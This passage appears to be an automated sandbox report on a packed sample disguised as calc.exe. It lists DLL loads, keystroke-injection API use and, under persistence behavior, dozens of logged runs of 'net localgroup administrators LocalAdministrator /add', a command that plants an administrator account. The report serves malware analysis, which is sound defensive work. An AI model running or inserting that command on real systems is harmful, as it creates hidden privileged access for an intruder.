Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: winmm.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sxs.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: jscript.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: winmm.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sxs.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: jscript.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: winmm.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sxs.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: jscript.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\calc.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\calc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\calc.exe

Code function: 0_2_00439814 CharLowerBuffW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,_strcat,GetCurrentProcess,TerminateProcess,VariantClear,FreeLibrary,

0_2_00439814

Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0044C070 push eax; ret	0_2_0044C084
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0044C070 push eax; ret	0_2_0044C0AC
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_0044D7C3 push ecx; ret	0_2_0044D7D3

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net1.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add

Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00412196 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00412196
Source: C:\Users\user\Desktop\calc.exe	Code function: 0_2_00440FF0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00440FF0

Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\calc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
